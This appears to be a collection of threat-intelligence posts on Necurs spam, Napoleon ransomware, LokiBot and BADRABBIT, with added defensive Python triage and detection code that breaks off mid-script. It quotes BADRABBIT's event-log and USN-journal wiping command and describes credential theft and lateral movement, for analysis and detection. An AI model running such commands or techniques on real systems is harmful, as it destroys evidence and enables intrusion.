Interestingly, some of these same strange aliases can be found on Project Honeypot’s list of the Top Dictionary Attacker Usernames, though it is unclear whether Necurs obtained their aliases from this list, or whether these aliases made Project Honeypot’s list as a result of Necurs’ spamming activity.

Project Honeypot’s Top Dictionary Attacker Usernames

Necurs Sending IPs

Next, Talos extracted the sending IP addresses responsible for transmitting Necurs’ spam emails, and we grouped the data according to geographical location. Rather than being uniformly distributed worldwide, a majority of Necurs’ nodes were concentrated among just a few countries – India (25.7% of total spam), Vietnam (20.3% of total spam), and Iran (7.3% of total spam). More than half (51.3%) of the sending IP addresses in our data came from just these three countries. In contrast, other large industrialized nations were only responsible for a tiny fraction of the spam. For example, the United States was home to 6,314 (less than 1%) of Necurs’ sending IPs. Russia was only attributed 38 sending IP addresses out of nearly 1.2 million total sender IPs!

Number of spam messages sent per country

Talos also analyzed the individual spam campaigns in order to determine how often the sending IP addresses were reused from campaign to campaign. We found very little infrastructure reuse. In fact, none of the sending IP addresses in our data were seen across all thirty-two of the campaigns we extracted, and only three sending IP addresses could be found across thirty of Necurs’ spam campaigns. The vast majority of sending IP addresses, 937,761 (78.6% of the total), were only ever seen in a single Necurs spam campaign! This means that the Necurs botnet is large enough to conduct attacks over several months without substantial reuse of most sending nodes – an impressive feat.

Number of unique IP addresses vs. how many campaigns in which they appeared

Necurs Spam Campaigns

Typically email campaigns from Necurs fall into one of two categories: high-volume weekday campaigns, or low volume continuous campaigns. Necurs has occasionally been seen sending high volume campaigns on weekends, but the vast majority of the time high volume campaigns are limited to the business week only. The mailing list database Necurs is using seems to be segmented, such that the high volume campaigns use one subset of email addresses from the DB, and the low volume campaigns use a different set of email addresses.

PUMP-N-DUMP STOCK SPAM

Below is an example of a pump-n-dump stock spam sent on April 12th, 2017 by Necurs touting the stock symbol QSMG, Quest Management Incorporated. On the following day the price of QSMG peaked at $2.33, probably netting the criminals a tidy gain on their initial investment. QSMG is currently worth less than $0.02.

A message touting the penny stock, QSMG
QSMG was at $2.33 on April 13. Currently it is worth less than $0.02

DATING SPAM

Necurs also sends dating spam. Recent dating spam has arrived without any URLs in the body, except a mailto: link to an email address. Current dating campaigns have involved the free email provider rambler.ru, but previous dating campaigns have taken advantage of similar free email services such as gmx.com. Necurs’ dating campaigns have also been known to include HTML links to fast-fluxed domains, or sometimes compromised websites (WordPress, etc.).

Necurs dating spam featuring an email address at rambler.ru

If you respond to one of these dating messages, you may be enrolled in a Russian dating website such as marmeladies.site. In this case, the criminals are making money by referring new users to these dating sites. Most likely they are being paid on an affiliate model.

Marmeladies is one of the dating sites to which victims who reply are directed

RANSOMWARE

Of course, one of Necurs’ most well-known payloads is ransomware. Necurs has been one of the biggest distributors of the Locky ransomware. Locky also works on an affiliate model. Inside each Locky sample, in the metadata, is an affiliate ID, which is always the same (3) for Necurs mailings. Most of the time, very little investment is made in the design of the messages themselves, as in the following example.

A typical ransomware campaign from Necurs

CRYPTOCURRENCY CREDENTIAL PHISHING

The rise (and fall) in the value of digital currencies such as Bitcoin and Ethereum has not escaped the attention of the Necurs criminals. They have been seen conducting attack campaigns using domains designed to look similar to legitimate wallet management websites. In the email below, note the extra word ‘my’ in the domain ‘mymyetherwallet.com’.

This domain is registered to appear similar to the real Ethereum wallet management site, myetherwallet.com

Recently, the Necurs attackers have drawn from previous stock pump-n-dump scams to come up with a relatively new tactic related to cryptocurrency. They had a spam campaign pumping Swisscoin (SIC).

A Necurs spam email encouraging recipients to buy Swisscoin (SIC)

JOB SPAM

Necurs was recently sending a low-volume job spam campaign that includes links to freshly registered domains. For example, in the email below, sent October 30th, 2017, we can see they are using a link to the domain ‘supercoins.top’. (The affiliate ID in the URL is always the same.)

An example of a low volume, job-related spam campaign from Necurs

Attribution

WHOIS-AGENT@GMX.COM

Checking the whois record for this domain, we see the following registration details. Note the registrant email ‘whois-agent@gmx.com’. This is an attempt by the threat actors to convince the casual observer that the domain is somehow registered through a third-party whois privacy protection service. Email accounts @gmx.com are free to the public, and in this instance the attackers have simply generated the alias ‘whois-agent’ for their use in registering domains.

A review of the domains registered to ‘whois-agent@gmx.com’ yields 399 domains (from DomainTools as of January 17, 2018). The list of domains registered to ‘whois-agent@gmx.com’ reads like a who’s-who of criminal activity.

Among some of the more notable domains we can see obvious phishing domains:

Typo-squattish domains targeting cryptocoin-related sites:

Fake Flash Player Update domains:

flash-ide-update.top
flash-ime-update.top
flash-one-eupdate.top
flash-one-update.info
flash-player-update.info
flash-update-player.info

Even domains intended to masquerade as government resources:

asic-gov-au.co
australia-gov-au.com
canadapost-office.info
govonfraud.info

A review of some of the domains in passive DNS gives us some other important clues. While most domains are only registered for the minimum of one year, the attackers have chosen to maintain the registration for a longer time on other domains such as ‘pp24.ws’. That domain is home to an online marketplace for buying and selling stolen credit card numbers, stolen SSH account credentials and more.

‘pp24.ws’ is a website dedicated to buying and selling stolen credit card numbers

Passive DNS also reveals instances where the attackers have hosted domains belonging to different registrants on the same IP address. For example, when Talos analyzed the passive DNS records for one of the attacker’s domains, ‘setinfoconf.com’, we found that this domain was hosted on a single IP address for a couple of months in late 2016 before being parked. When we reviewed the other domains living on that same IP address we saw a bit of a pattern, and most importantly, some of these domains were NOT in the list of domains owned by ‘whois-agent@gmx.com’.

WHOIS-PROTECT@HOTMAIL.COM

When we check the registration information for one of the above domains, ‘setinofis.pw’, we find that there is a different registrant. This time the email address used to register the domain was ‘whois-protect@hotmail.com’. Just as with the ‘whois-agent@gmx.com’ address, this is an attempt to make it appear to a casual observer that the domain is protected by whois privacy protection, when in reality this email account appears to be under the direct control of the attackers themselves.

Reviewing the list of 1103 domains (Domain Tools as of January 17, 2018) associated with the ‘whois-protect@hotmail.com’ email address we see much of the same illicit activity we saw before.

More phishing domains:

More domains targeting cryptocoin-related resources:

Similar themed, fake Flash Player updates:

We even see targeting of government resources, just as we did with the other registrant account:

TZYYWZ@QQ.COM

Checking the registration on some of the domains associated with ‘whois-privacy@hotmail.com’, we can find some domains in which there are other registrants and the whois-privacy@ address is simply an Administrative and Technical Contact. This reveals an additional registrant email address employed by the attackers, ‘tzyywz@qq.com’.

According to Domain Tools (as of January 17, 2017), that qq.com email address is associated with over 2500 domains. Most of the domains belonging to this registrant email appeared to be domainer-style domains located at TLDs such as .bid and .top, but we also see a heavy dose of illegitimate-looking domains in the set as well.

Some typical ‘Domainer’-ish domains:

Illegitimate Domains:

MORE DOMAIN REGISTRANT ACCOUNTS REVEALED

We can associate even more registrant email accounts with these same threat actors using similar techniques. While researching passive DNS for one of the domains we found previously, ‘blokochain.info’, we ran across something very interesting. That particular domain was hosted October 21, 2017 on the IP address 47.254.18.28, which belongs to Alibaba as part of their cloud hosting product. When we analyze all the other domains which have been hosted on that same IP we see many domains that belong to the registrant email addresses we already knew about, ‘whois-agent@gmx.com’ and ‘whois-privacy@hotmail.com’. However, we also see several domains associated with different registrants.

SEOBOSS@SEZNAM.CZ

Looking at the list of domains found on this same Alibaba IP, we find the domain ‘paltruise.gdn’. This domain is registered to the registrant email address ‘seoboss@seznam.cz’. This registrant has registered 125 domains (Domain Tools as of January 17, 2018), many of which have been linked to malicious activities. According to these links, domains associated with this registrant email have been used as part of the Rig Exploit Kit infrastructure. The domain ‘paltruise.gdn’ was hosted on the 47.90.202.68 Alibaba IP address on October 19, 2017 – only two days before the IP was used to host domains belonging to ‘whois-protect@hotmail.com’.

GALICOLE@MAIL.COM

The domain ‘indian-trk711.com’ belongs to the registrant email address ‘galicole@mail.com’. The ‘indian-trk711.com’ domain was hosted on the 47.254.18.28 IP on October 25th through October 30th, 2017 – also very close to the timeframe in which we saw the IP hosting the other malicious domains.

As of January 16, 2017, DomainTools attributes 918 domains to the registrant email address ‘galicole@mail.com’. Among some of the domains associated with this address we find gems such as:

XLBS@TVCHD.COM

The domain ‘daccat.at’ is registered to ‘xlbs@tvchd.com’. A Google search for this domain produces this link at Hybrid Analysis and indicates that this particular domain was contacted as part of a piece of malware. At Virus Total, 50/68 antivirus engines detect this particular sample as malicious.

JIAMCHO1955@DNSNAME.INFO

Searching Google for this registrant email address yields multiple links to malware that reaches out to domains owned by ‘jiamcho1955@dnsname.info’. Virus Total corroborates this information showing 48 and 53 antivirus detections respectively.

ONE INSTANCE TO HOST THEM ALL

Reaching out through various contacts, Talos was able to confirm that, in fact, a single Alibaba cloud instance was controlling this same IP address for the entire time period from October 19, 2017 through October 30, 2017. Is this IP address some part of a criminal domain hosting service? Or is it that a single nefarious enterprise is behind all of these various registrant email accounts and their associated domains? Only the criminals involved in this enterprise can say for certain. Talos continues to monitor this situation with an eye towards further deciphering the business model deployed by these miscreants.

Conclusion

Now that Necurs is back from its regular holiday break, it is attempting to fill our inboxes with junk mail and malware once again. On one hand, the size of the Necurs botnet and its ability to send from different nodes in every campaign make it difficult to defend against; standard IP address blacklists are ineffective against such tactics. Fortunately for network defenders, the fact that Necurs does relatively little to curate its recipient database limits the damage it can do. There are only so many times the same recipients will fall for Necurs’ same, repetitive tricks. We can expect that Necurs will continue to try variations on some of its tried and true attacks, and so user education against these threats remains paramount.

Go to Source
Author: Talos Group

Napoleon: a new version of Blind ransomware

The ransomware previously known as Blind has been spotted recently with a .napoleon extension and some additional changes. In this post, we’ll analyze the sample for its structure, behavior, and distribution method.

Analyzed samples

31126f48c7e8700a5d60c5222c8fd0c7 – Blind ransomware (the first variant), with .blind extension

9eb7b2140b21ddeddcbf4cdc9671dca1 – Variant with .kill extension

235b4fa8b8525f0a09e0c815dfc617d3 – Variant with .napoleon extension (main focus of this analysis)

//special thanks to @demonslay335 for sharing the older samples

Distribution method

So far we are not 100 percent sure about the distribution method of this new variant. However, looking at the features of the malware and judging from information from the victims, we suspect that the attackers spread it manually by dropping and deploying it on hacked machines (probably via IIS). This method of distribution is not popular or efficient; however, we’ve encountered similar cases in the past, such as DMALocker or LeChiffre ransomware. Also, a few months ago, hacked IIS servers were used as a vector to plant Monero miners. The common feature of samples dropped in this way is that they are not protected by any cryptor (because it’s not necessary for this distribution method).

Behavioral analysis

After the ransomware is deployed, it encrypts files one-by-one, adding its extension in the format [email].napoleon.

Looking at the content of the encrypted test files, we can see that the same plaintext gave different ciphertext. This always indicates that a different key or initialization vector was used for each file. (After examining the code, it turned out that the difference was in the initialization vector.)

Visualizing the encrypted content helps us guess the algorithm with which the files were encrypted. In this case, we see no visible patterns, which leads us to suspect an algorithm with some method of chaining cipher blocks (most commonly AES in CBC mode, or possibly CFB mode). Below, you can see the visualization made with the help of the file2png script: on the left is a BMP file before encryption, and on the right, after encryption by Napoleon:

At the end of each file, we found a unique 384-character block of alphanumeric characters. They represent 192 bytes written in hexadecimal. Most probably this block is the encrypted initialization vector for the particular file:
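An added example, not from the Malwarebytes analysis, showing how an analyst can check a suspect file against the layout described above: the 384-hex-character trailer (192 bytes), a ciphertext body aligned to the AES block size, and the absence of repeated blocks that a chained mode produces. The sample data is constructed, and the literal brackets in the extension are assumed from the Blind naming scheme.

```python
import math
import random
import re
from collections import Counter

# Napoleon renames files to <name>.[<email>].napoleon (the literal brackets
# around the e-mail are an assumption carried over from Blind) and appends a
# 384-character hexadecimal block, i.e. 192 raw bytes, to each file.
EXT_RE = re.compile(r"\.\[?[^\[\]\s]+@[^\[\]\s]+\]?\.napoleon$", re.IGNORECASE)
TRAILER_HEX_LEN = 384
TRAILER_LEN = TRAILER_HEX_LEN // 2   # 192 bytes
BLOCK = 16                           # AES block size in bytes


def is_napoleon_name(filename):
    """True if the file name carries the [email].napoleon extension."""
    return EXT_RE.search(filename) is not None


def split_trailer(blob):
    """Split an encrypted file into (ciphertext body, decoded 192-byte trailer).
    Raises ValueError if the last 384 characters are not hexadecimal."""
    if len(blob) < TRAILER_HEX_LEN:
        raise ValueError("file too short to hold a Napoleon trailer")
    tail = blob[-TRAILER_HEX_LEN:]
    if re.fullmatch(rb"[0-9a-fA-F]+", tail) is None:
        raise ValueError("trailer is not hexadecimal")
    return blob[:-TRAILER_HEX_LEN], bytes.fromhex(tail.decode("ascii"))


def shannon_entropy(data):
    """Bits per byte; 8.0 is the maximum, reached by uniformly random data."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def repeated_blocks(body):
    """Number of surplus 16-byte blocks that occur more than once. A chained
    mode (CBC/CFB) yields none; ECB over repetitive plaintext yields many,
    which is what shows up as visible patterns in a file2png image."""
    usable = len(body) - len(body) % BLOCK
    blocks = [body[i:i + BLOCK] for i in range(0, usable, BLOCK)]
    return sum(c - 1 for c in Counter(blocks).values() if c > 1)


def triage(filename, blob):
    """Report whether a file is consistent with the Napoleon layout."""
    result = {"name_matches": is_napoleon_name(filename)}
    try:
        body, trailer = split_trailer(blob)
    except ValueError as exc:
        result.update(trailer_ok=False, error=str(exc), consistent=False)
        return result
    entropy = shannon_entropy(body)
    result.update(
        trailer_ok=len(trailer) == TRAILER_LEN,
        body_len=len(body),
        block_aligned=len(body) % BLOCK == 0,   # expected of padded AES output
        entropy=round(entropy, 3),
        repeated_blocks=repeated_blocks(body),
    )
    result["consistent"] = (
        result["name_matches"] and result["trailer_ok"] and result["block_aligned"]
        and entropy > 7.5 and result["repeated_blocks"] == 0
    )
    return result


def constructed_sample(seed, ecb_like=False):
    """Constructed test data, not a real Napoleon file: the body imitates
    chained-mode output with pseudo-random bytes (or ECB-like output by
    repeating one block); the trailer is 192 pseudo-random bytes as hex."""
    rng = random.Random(seed)
    if ecb_like:
        body = bytes(rng.getrandbits(8) for _ in range(BLOCK)) * 256
    else:
        body = bytes(rng.getrandbits(8) for _ in range(4096))
    trailer = bytes(rng.getrandbits(8) for _ in range(TRAILER_LEN)).hex().encode("ascii")
    return body + trailer


if __name__ == "__main__":
    name = "report.docx.[attacker@example.invalid].napoleon"
    print(triage(name, constructed_sample(1)))
    print(triage(name, constructed_sample(2, ecb_like=True)))
```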

The ransom note is in HTA format and looks like this:

It also contains a hexadecimal block, which is probably the victim’s key, encrypted with the attackers’ public key.

The GUI of Napoleon looks simplified in comparison to the Blind ransomware. However, the building blocks are the same:

It is common among ransomware authors to prepare a Tor-based website that allows automatic processing of payments and better organizes communication with the victim. In this case, the attackers decided to use just an email—probably because they planned for the campaign to be small.

Among the files created by the Napoleon ransomware, we no longer find the cache file (netcache64.sys) that in the previous editions allowed the key to be recovered without paying the ransom.

Below is the cache file dropped by the Blind ransomware (the predecessor of Napoleon):

Inside the code

The malware is written in C++. It is not packed by any cryptor.

The execution starts in the function WinMain:

The flow is pretty simple. First, the ransomware checks the privileges with which it runs. If it has sufficient privileges, it deletes shadow copies. Then, it closes processes related to databases—Oracle and SQL Server—so that they will not block access to the database files it wants to encrypt. Next, it goes through the disks and encrypts found files. At the end, it pops up the dropped ransom note in HTA format.

Comparing the code of Napoleon with the code of Blind, we see that not just the extension of encrypted files has changed, but also many functions inside have been refactored.

Below is a fragment of the view from BinDiff: Napoleon vs Blind:

What is attacked?

First, the ransomware enumerates all the logical drives in the system and adds them into a target list. It attacks both fixed and remote drives (type 3 -> DRIVE_FIXED and 4 -> DRIVE_REMOTE):

This ransomware does not have any list of attacked extensions. It attacks all the files it can reach. It skips only the files that already have the extension indicating they are encrypted by Napoleon:

The email used in the extension is hardcoded in the ransomware’s code.

Encryption implementation

Just like the previous version, the cryptographic functions of Napoleon are implemented with the help of the statically-linked library Crypto++ (source).

Referenced strings pointing to Crypto++:

Inside, we found a hardcoded blob—the RSA public key of the attackers:

After conversion to a standardized format, such as PEM, we were able to read its parameters using openssl, confirming that it is a valid 2048-bit RSA key:

Public-Key: (2048 bit)
Exponent: 17 (0x11)

This attacker’s public key is later used to encrypt the random key generated for the particular victim. The random key is the one used to encrypt files – after it is used and destroyed, its encrypted version is stored in the victim’s ID displayed in the ransom note. Only the attackers, having the private RSA key, are capable of recovering it.

The random AES key (32 bit) is generated by a function provided by the Crypto++ library:

Underneath, it uses the secure random generator CryptGenRandom:

All the files are encrypted with the same key, however the initialization vector is different for each.

Encrypting a single file:

Inside the function denoted as encrypt_file, the crypto is initialized with a new initialization vector:

The fragment of code responsible for setting the IV:

Setting initialization vector:

Encrypting file content:

The same buffer after encryption:

Conclusion

Napoleon ransomware will probably not become a widespread threat. The authors prepared it for small campaigns—a lot of data, such as the email address, is hardcoded. It does not come with any external configuration like Cerber that would allow for fast customization.

So far, it seems that the authors fixed the previous bug in Blind of dropping the cache file. That means the ransomware is not decryptable without having the original key. All we can recommend is prevention.

This ransomware family is detected by Malwarebytes as Ransom.Blind.

Appendix

Read about how to decrypt the previous Blind variant here.

The post Napoleon: a new version of Blind ransomware appeared first on Malwarebytes Labs.

Go to Source
Author: Malwarebytes Labs

LokiBot: If not stealing, then extorting

Remember the Hydra of ancient mythology? The many-headed serpent that grew two heads when one was chopped off? A similarly dangerous beast has appeared in the Android malware zoo.


LokiBot as a banking Trojan

How do ordinary banking Trojans behave? They present the user with a fake screen that simulates the mobile banking interface. Unsuspecting victims enter their login credentials, which the malware redirects to the attackers, giving them access to the accounts.

How does LokiBot behave? Roughly the same way, but it simulates not only a banking app screen, but also WhatsApp, Skype, and Outlook client interfaces, displaying notifications purporting to come from these applications.

This means that a person can receive a fake notification, supposedly from their bank, saying that funds have been transferred to their account and, seeing the good news, then log in to the mobile banking client for confirmation. LokiBot even makes the smartphone vibrate when it displays the notification about the alleged transfer, which helps hoodwink even clued-in users.

But LokiBot has other tricks in store: It can open a browser, navigate to specific pages, and even use an infected device to send spam, which is basically how it distributes itself. Having pinched money from your account, LokiBot keeps going, sending a malicious SMS to all contacts in the phone book to infect as many smartphones and tablets as possible, and even replying to incoming messages if necessary.

If an attempt is made to remove LokiBot, the malware reveals another facet: To steal funds from a bank account, it needs administrator rights; if you try to deny it permission, it mutates from a banking Trojan into ransomware.


LokiBot as ransomware: how to unlock an infected smartphone

In this case, LokiBot locks the screen and displays a message accusing the victim of viewing child pornography and demanding ransom; it also encrypts data on the device. Examining LokiBot’s code, researchers discovered that it uses weak encryption and doesn’t work properly; the attack leaves unencrypted copies of all files on the device, only under different names, so restoring the files is relatively simple.

However, the device screen is still locked, and the malware creators ask for about $100 in Bitcoin to unlock it. But you don’t have to oblige: After rebooting the device in safe mode, you can strip the malware of administrator rights and delete it. To do so, you first need to determine which version of Android you have:

  • Select Settings.
  • Select the General tab.
  • Select About the device.
  • Find the line Android version — the numbers below it indicate your OS version.

To enable safe mode on a device with Version 4.4 to 7.1, do the following:

  • Press and hold the power button until a menu appears with the option Power off or Disconnect power source.
  • Press and hold Power off or Disconnect power source.
  • In the Turn on safe mode menu that appears, click OK.
  • Wait for the phone to reboot.

Owners of devices with other versions of Android should look online for information about how to enable safe mode for their particular phone.

Unfortunately, not everyone knows about this method of killing the malware: LokiBot victims have already coughed up nearly $1.5 million. And with LokiBot available on the black market for a mere $2,000, it is likely that the criminals responsible have repaid their investment many times over.


How to protect against LokiBot

In effect, the measures that can be taken to protect against LokiBot are applicable to any mobile malware. Here’s how to protect yourself:

– Never click on suspicious links — that’s how LokiBot spreads.

– Download apps only via Google Play — but be cautious even in the official store.

– Install a reliable security solution on your smartphone and tablet. Kaspersky Internet Security for Android detects all variants of LokiBot. With the paid version, there’s no need to scan the smartphone after installing each new application.

Go to Source
Author: Alexandra Golovina

BACKSWING – Pulling a BADRABBIT Out of a Hat

Executive Summary

On Oct. 24, 2017, coordinated strategic web compromises started to
distribute BADRABBIT ransomware to unwitting users. FireEye appliances
detected the download attempts and blocked our user base from
infection. During our investigation into the activity, FireEye
identified a direct overlap between BADRABBIT redirect sites and sites
hosting a profiler we’ve been tracking as BACKSWING. We’ve identified
51 sites hosting BACKSWING and four confirmed to drop BADRABBIT.
Throughout 2017, we observed two versions of BACKSWING and saw a
significant increase in May with an apparent focus on compromising
Ukrainian websites. The pattern of deployment raises the possibility of
a strategic sponsor with specific regional interests and suggests a
motivation other than financial gain. Given that many domains are
still compromised with BACKSWING, we anticipate that there is a risk
that they will be used for future attacks.

Incident Background

Beginning on Oct. 24 at 08:00 UTC, FireEye detected and blocked
attempts to infect multiple clients with a drive-by download
masquerading as a Flash Update (install_flash_player.exe) that
delivered a wormable variant of ransomware. Users were redirected to
the infected site from multiple legitimate sites (e.g.
http://www.mediaport[.]ua/sites/default/files/page-main.js)
simultaneously, indicating a coordinated and widespread strategic web
compromise campaign.

FireEye network devices blocked infection attempts at over a dozen
victims primarily in Germany, Japan, and the U.S. until Oct. 24 at
15:00 UTC, when the infection attempts ceased and attacker
infrastructure – both 1dnscontrol[.]com and the legitimate websites
containing the rogue code – was taken offline.

BACKSWING Framework Likely Connected to BADRABBIT Activity

Strategic web compromises can have a significant amount of
collateral targeting. It is common for threat actors to pair a
strategic web compromise with profiling malware to target systems with
specific application versions or victims. FireEye observed that
BACKSWING, a malicious JavaScript profiling framework, was deployed to
at least 54 legitimate sites starting as early as September 2016. A
handful of these sites were later used to redirect to BADRABBIT
distribution URLs.

FireEye iSIGHT Intelligence tracks two distinct versions of BACKSWING
that contain the same functionality but differ in their code styles.
We consider BACKSWING a generic container used to select attributes of
the current browsing session (User-Agent, HTTP Referrer, Cookies, and
the current domain). This information is then relayed to a “C2”,
sometimes referred to as a “receiver.” If the receiver is online,
the server returns a unique JSON blob to the caller, which is then
parsed by the BACKSWING code (Figure 1).


Figure 1: BACKSWING Reply

BACKSWING expects the JSON blob to have two fields,
“InjectionType” (expected to be an integer) and “InjectionString”
(expected to be a string containing HTML content). BACKSWING version 1
(Figure 2) branches on the value of “InjectionType” into two code
paths:

  • If InjectionType == 1 (redirect the browser to a URL)
  • If InjectionType != 1 (render the HTML into the DOM)


Figure 2: Backswing Version 1

In Version 2 (Figure 3), BACKSWING retains similar logic, but
generalizes the handling so that InjectionString is used strictly to
render the reply into the DOM.


Figure 3: BACKSWING Version 2

Version 1:

  • FireEye observed the first version of BACKSWING in late 2016 on
    websites belonging to a Czech Republic hospitality organization, in
    addition to a government website in Montenegro. Turkish tourism
    websites were also injected with this profiler.
  • BACKSWING v1 was commonly injected in cleartext into affected
    websites, but over time, actors began to obfuscate the code using the
    open-source Dean Edwards Packer and injected it into legitimate
    JavaScript resources on affected websites. Figure 4 shows the
    injection content.
  • Beginning in May 2017, FireEye observed a number of Ukrainian
    websites compromised with BACKSWING v1, and in June 2017 began to see
    content returned from BACKSWING receivers.
  • In late June 2017, BACKSWING servers returned an HTML div element
    with two distinct identifiers. When decoded, BACKSWING v1 embedded
    two div elements within the DOM with values of
    07a06a96-3345-43f2-afe1-2a70d951f50a and
    9b142ec2-1fdb-4790-b48c-ffdf22911104. No additional content was
    observed in these replies.


Figure 4: BACKSWING Injection Content

Version 2:

  • The earliest that FireEye observed BACKSWING v2 occurred on
    Oct. 5, 2017, across multiple websites that previously hosted
    BACKSWING v1.
  • BACKSWING v2 was predominantly injected into legitimate JavaScript
    resources hosted on affected websites; however, some instances were
    injected into the sites’ main pages.
  • FireEye observed limited instances in which websites hosting this
    version were also implicated in suspected BADRABBIT infection
    chains (detailed in Table 1).

Malicious profilers allow attackers to obtain more information about
potential victims before deploying payloads (in this case, the
BADRABBIT “flash update” dropper). While FireEye has not directly
observed BACKSWING delivering BADRABBIT, BACKSWING was observed on
multiple websites that were seen referring FireEye customers to
1dnscontrol[.]com, which hosted the BADRABBIT dropper.

Table 1 highlights the legitimate sites hosting BACKSWING that were
also used as HTTP referrers for BADRABBIT payload distribution.

Compromised Website     BACKSWING Receiver                                BACKSWING Version  Observed BADRABBIT Redirect
blog.fontanka[.]ru      Not Available                                     Not Available      1dnscontrol[.]com
www.aica.co[.]jp        http://185.149.120[.]3/scholargoogle/             v2                 1dnscontrol[.]com
www.fontanka[.]ru       http://185.149.120[.]3/scholargoogle/             v2                 1dnscontrol[.]com
www.mediaport[.]ua      http://172.97.69[.]79/i/                          v1                 1dnscontrol[.]com
www.mediaport[.]ua      http://185.149.120[.]3/scholargoogle/             v2                 1dnscontrol[.]com
www.smetkoplan[.]com    http://172.97.69[.]79/i/                          v1                 1dnscontrol[.]com
www.smetkoplan[.]com    http://38.84.134[.]15/Core/Engine/Index/default   v1                 1dnscontrol[.]com
www.smetkoplan[.]com    http://185.149.120[.]3/scholargoogle/             v2                 1dnscontrol[.]com

Table 1: Sites hosting BACKSWING profilers that
redirected users to a BADRABBIT download site

The compromised websites listed in Table 1 demonstrate one of the
first times that we have observed the potential weaponization of
BACKSWING. FireEye is tracking a growing number of legitimate websites
that also host BACKSWING, underscoring a considerable footprint the
actors could leverage in future attacks. Table 2 provides a list of
sites also compromised with BACKSWING.


Table 2: Additional sites hosting BACKSWING
profilers and associated receivers

The distribution of sites compromised with BACKSWING suggests a
motivation other than financial gain. FireEye observed this framework
on compromised Turkish sites and Montenegrin sites over the past year.
We observed a spike of BACKSWING instances on Ukrainian sites, with a
significant increase in May 2017. While some sites hosting BACKSWING
do not have a clear strategic link, the pattern of deployment raises
the possibility of a strategic sponsor with specific regional interests.

BADRABBIT Components

BADRABBIT is made up of several components, as described in Figure 5.


Figure 5: BADRABBIT components

Install_flashPlayer.exe (MD5: FBBDC39AF1139AEBBA4DA004475E8839)

The install_flashplayer.exe payload drops infpub.dat (MD5:
C4F26ED277B51EF45FA180BE597D96E8) to the C:\Windows directory and
executes it using rundll32.exe with the argument
C:\Windows\infpub.dat,#1 15. This execution format mirrors that of EternalPetya.

infpub.dat (MD5: 1D724F95C61F1055F0D02C2154BBCCD3)

The infpub.dat binary is the primary ransomware component
responsible for dropping and executing the additional components shown
in the BADRABBIT Components section. An embedded RSA-2048 key
facilitates the encryption process, which uses an AES-128 key to
encrypt files. The extensions listed below are targeted for encryption:

.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip

The following directories are ignored during the encryption process:

  • Windows
  • Program Files
  • ProgramData
  • AppData

The malware writes its ransom message to the root of each affected
drive with the filename Readme.txt.

infpub.dat is capable of performing lateral movement via WMI or
SMB. Harvested credentials provided by an embedded Mimikatz executable
facilitate the infection of other systems on the network. The malware
contains lists of common usernames, passwords, and named pipes that it
can use to brute-force other credentials for lateral movement.

If one of four Dr.Web antivirus processes is present on the system,
file encryption is not performed. If the malware is executed with the
“-f” command line argument, credential theft and lateral movement are bypassed.

dispci.exe (MD5: B14D8FAF7F0CBCFAD051CEFE5F39645F)

The dispci.exe binary interacts with the DiskCryptor driver
(cscc.dat) to install the malicious bootloader. If one of three McAfee
antivirus processes is running on the system, dispci.exe is written to
the %ALLUSERSPROFILE% directory; otherwise, it is written to
C:\Windows. The sample is executed on system start using a scheduled
task named rhaegal.

cscc.dat (MD5s: B4E6D97DAFD9224ED9A547D52C26CE02 or EDB72F4A46C39452D1A5414F7D26454A)

A 32- or 64-bit DiskCryptor driver named cscc.dat facilitates disk
encryption. It is installed in the C:\Windows directory as a kernel
driver service named cscc.

Mimikatz usage (MD5s: 37945C44A897AA42A66ADCAB68F560E0 or 347AC3B6B791054DE3E5720A7144A977)

A 32- or 64-bit Mimikatz variant is written to a temporary file (e.g.,
651D.tmp) in the C:\Windows directory and executed by passing a named
pipe string (e.g., \\.\pipe\{8A93FA32-1B7A-4E2F-AAD2-76A095F261DC}) as
an argument. Harvested credentials are passed back to infpub.dat via
the named pipe, similar to EternalPetya.

BADRABBIT Compared to EternalPetya

infpub.dat contains a checksum algorithm like the one used in
EternalPetya. However, the initial checksum value differs slightly:
0x87654321 in infpub.dat, 0x12345678 in EternalPetya. infpub.dat also
supports the same command line arguments as EternalPetya, with the
addition of the “-f” argument, which bypasses the malware’s credential
theft and lateral movement capabilities.

Like EternalPetya, infpub.dat determines if a specific file exists
on the system and will exit if found. The file in this case is
cscc.dat. infpub.dat contains a wmic.exe lateral movement capability,
but unlike EternalPetya, does not contain a PSEXEC binary used to
perform lateral movement.

Both samples utilize the same series of wevtutil and fsutil commands
to perform anti-forensics:

wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %SYSTEMDRIVE%

FireEye Detections

Product                Detection Names
NX, EX, AX, FX, ETP    malware.binary.exe, Trojan.Ransomware.MVX,
                       Exploit.PossibleWaterhole.BACKSWING
HX                     BADRABBIT RANSOMWARE (FAMILY), Gen:Heur.Ransom.BadRabbit.1,
                       Gen:Variant.Ransom.BadRabbit.1
TAP                    WINDOWS METHODOLOGY [Scheduled Task Created],
                       WINDOWS METHODOLOGY [Service Installation],
                       WINDOWS METHODOLOGY [Audit Log Cleared],
                       WINDOWS METHODOLOGY [Rundll32 Ordinal Arg],
                       WINDOWS METHODOLOGY [Wevtutil Clear-log],
                       WINDOWS METHODOLOGY [Fsutil USN Deletejournal],
                       WINDOWS METHODOLOGY [Multiple Admin Share Failures]
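The TAP methodology names above and the anti-forensics command chain map onto process-creation telemetry. The following is an added example, not FireEye's detection content: it matches the rundll32 ordinal argument, the rhaegal/drogon task creation, the wevtutil and fsutil wiping, and the forced reboot against constructed command-line records (the dispci.exe path and -id value in the samples are placeholders).

```python
"""Host-side detection for the BADRABBIT behaviours described above.

Added example; this is not FireEye's detection content. The rules cover the
TAP methodology names quoted in the table (rundll32 ordinal argument,
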